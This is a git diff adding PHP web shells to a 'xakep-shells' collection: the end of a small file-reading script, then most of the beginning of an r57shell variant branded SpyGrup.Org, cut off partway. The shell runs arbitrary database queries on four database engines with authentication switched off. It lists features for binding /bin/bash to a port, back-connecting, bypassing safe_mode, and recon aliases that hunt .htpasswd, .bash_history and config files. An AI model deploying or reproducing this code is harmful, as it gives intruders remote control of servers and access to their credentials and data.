+echo "<PRE>\n";
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+die("\nSnIpEr_SA");
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>
+<B>".htmlspecialchars($u1p)."</B> ÚÝæÇ! ÇáãáÝ ÛíÑ ãæÌæÏ Çæ áíÓ áÏíß ÇáÕáÇÍíå ááÏÎæá.</CENTER></FONT>");
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/spy.php.php.txt b/xakep-shells/PHP/spy.php.php.txt
new file mode 100644
index 0000000..a5b232c
--- /dev/null
+++ b/xakep-shells/PHP/spy.php.php.txt
@@ -0,0 +1,1889 @@
+<?php
+/******************************************************************************************************/
+/* 
+/* 
+/*    ssssssss  pppp  pppp    yyyyyy  yyyyyy    gggg  gggg  rrrr  rrrr  uuuu    uuuu  pppp  pppp  
+/*  ss            pppp    pp    yy      yy    gg    gggg      rrrr        uu      uu    pppp    pp
+/*   ssssss      pp      pp      yy  yy      gg      gg      rr          uu      uu    pp      pp
+/*         ss    pp      pp      yy  yy      gg      gg      rr          uu    uuuu    pp      pp
+/* ssssssss      pppppppp          yy          gggggggg    rrrrrrrr        uuuu  uuuu  pppppppp  
+/*               pp                yy                gg                                pp        
+/*             pppppp          yyyyyy          gggggg                                pppppp      
+/* 
+/*                    admin@spygrup.org[Kruis]   -   yaduris@spygrup.org[YaduriS]
+/*
+/*
+/*  r57shell.php - �крипт на пхп позвол�ющий вам выполн�ть шелл команды  на �ервере через браузер
+/*  Вер�и�: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ �а�тройки  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "SpyGrup.Org SpeciaL";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ �утентификаци� ~~~ */
+
+// $auth = 1; - �утентификаци� включена
+// $auth = 0; - �утентификаци� выключена
+$auth = 0;
+
+// Логин и пароль дл� до�тупа к �крипту
+// �Е З�БУДЬТЕ СМЕ�ИТЬ ПЕРЕД Р�ЗМЕЩЕ�ИЕМ �� СЕРВЕРЕ!!!
+$name='teufel'; // логин пользовател�
+$pass='spyms'; // пароль пользовател�
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- Здрав�твуй  Ва�� -->
+<html>
+<head>
+<title>shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+Выбор �зыка
+$language='eng' - ру��кий
+$language='ru' - англий�кий
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'Выполненна� команда',
+'ru_text2' =>'Выполнение команд на �ервере',
+'ru_text3' =>'Выполнить команду',
+'ru_text4' =>'Рабоча� директори�',
+'ru_text5' =>'Загрузка файлов на �ервер',
+'ru_text6' =>'Локальный файл',
+'ru_text7' =>'�лиа�ы',
+'ru_text8' =>'Выберите алиа�',
+'ru_butt1' =>'Выполнить',
+'ru_butt2' =>'Загрузить',
+'ru_text9' =>'Открытие порта и прив�зка его к /bin/bash',
+'ru_text10'=>'Открыть порт',
+'ru_text11'=>'Пароль дл� до�тупа',
+'ru_butt3' =>'Открыть',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-адре�',
+'ru_text14'=>'Порт',
+'ru_butt4' =>'Выполнить',
+'ru_text15'=>'Загрузка файлов � удаленного �ервера',
+'ru_text16'=>'И�пользовать',
+'ru_text17'=>'Удаленный файл',
+'ru_text18'=>'Локальный файл',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'И�пользовать',
+'ru_text21'=>'�овое им�',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Локальный порт',
+'ru_text24'=>'Удаленный хо�т',
+'ru_text25'=>'Удаленный порт',
+'ru_text26'=>'И�пользовать',
+'ru_butt5' =>'Запу�тить',
+'ru_text28'=>'Работа в safe_mode',
+'ru_text29'=>'До�туп запрещен',
+'ru_butt6' =>'Сменить',
+'ru_text30'=>'Про�мотр файла',
+'ru_butt7' =>'Выве�ти',
+'ru_text31'=>'Файл не найден',
+'ru_text32'=>'Выполнение PHP кода',
+'ru_text33'=>'Проверка возможно�ти обхода ограничений open_basedir через функции cURL',
+'ru_butt8' =>'Проверить',
+'ru_text34'=>'Проверка возможно�ти обхода ограничений safe_mode через функцию include',
+'ru_text35'=>'Проверка возможно�ти обхода ограничений safe_mode через загрузку файла в mysql',
+'ru_text36'=>'База',
+'ru_text37'=>'Логин',
+'ru_text38'=>'Пароль',
+'ru_text39'=>'Таблица',
+'ru_text40'=>'Дамп таблицы базы данных',
+'ru_butt9' =>'Дамп',
+'ru_text41'=>'Сохранить в файле',
+'ru_text42'=>'Редактирование файла',
+'ru_text43'=>'Редактировать файл',
+'ru_butt10'=>'Сохранить',
+'ru_butt11'=>'Редактировать',
+'ru_text44'=>'Редактирование файла невозможно! До�туп только дл� чтени�!',
+'ru_text45'=>'Файл �охранен',
+'ru_text46'=>'Про�мотр phpinfo()',
+'ru_text47'=>'Про�мотр на�троек php.ini',
+'ru_text48'=>'Удаление временных файлов',
+'ru_text49'=>'Удаление �крипта � �ервера',
+'ru_text50'=>'Информаци� о проце��оре',
+'ru_text51'=>'Информаци� о пам�ти',
+'ru_text52'=>'Тек�т дл� пои�ка',
+'ru_text53'=>'И�кать в папке',
+'ru_text54'=>'Пои�к тек�та в файлах',
+'ru_butt12'=>'�айти',
+'ru_text55'=>'Только в файлах',
+'ru_text56'=>'�ичего не найдено',
+'ru_text57'=>'Создать/Удалить Файл/Директорию',
+'ru_text58'=>'Им�',
+'ru_text59'=>'Файл',
+'ru_text60'=>'Директорию',
+'ru_butt13'=>'Создать/Удалить',
+'ru_text61'=>'Файл �оздан',
+'ru_text62'=>'Директори� �оздана',
+'ru_text63'=>'Файл удален',
+'ru_text64'=>'Директори� удалена',
+'ru_text65'=>'Создать',
+'ru_text66'=>'Удалить',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Команда',
+'ru_text69'=>'Параметр1',
+'ru_text70'=>'Параметр2',
+'ru_text71'=>"Второй параметр команды:\r\n- дл� CHOWN - им� нового пользовател� или его UID (чи�лом) \r\n- дл� команды CHGRP - им� группы или GID (чи�лом) \r\n- дл� команды CHMOD - целое чи�ло в во�ьмеричном пред�тавлении (например 0777)",
+'ru_text72'=>'Тек�т дл� пои�ка',
+'ru_text73'=>'И�кать в папке',
+'ru_text74'=>'И�кать в файлах',
+'ru_text75'=>'* можно и�пользовать регул�рное выражение',
+'ru_text76'=>'Пои�к тек�та в файлах � помощью утилиты find',
+'ru_text77'=>'Про�мотр �труктуры базы данных',
+'ru_text78'=>'Показывать таблицы',
+'ru_text79'=>'Показывать �толбцы',
+'ru_text80'=>'Тип',
+'ru_text81'=>'Сеть',
+'ru_text82'=>'Базы данных',
+'ru_text83'=>'Выполнение SQL запро�а',
+'ru_text84'=>'SQL запро�',
+'ru_text85'=>'Проверка возможно�ти обхода ограничений safe_mode через выполнение команд в MSSQL �ервере',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+�лиа�ы команд
+Позвол�ют избежать многократного набора одних и тех-же команд. ( Сделано благодар� моей природной лени )
+Вы можете �ами добавл�ть или измен�ть команды.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>и</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
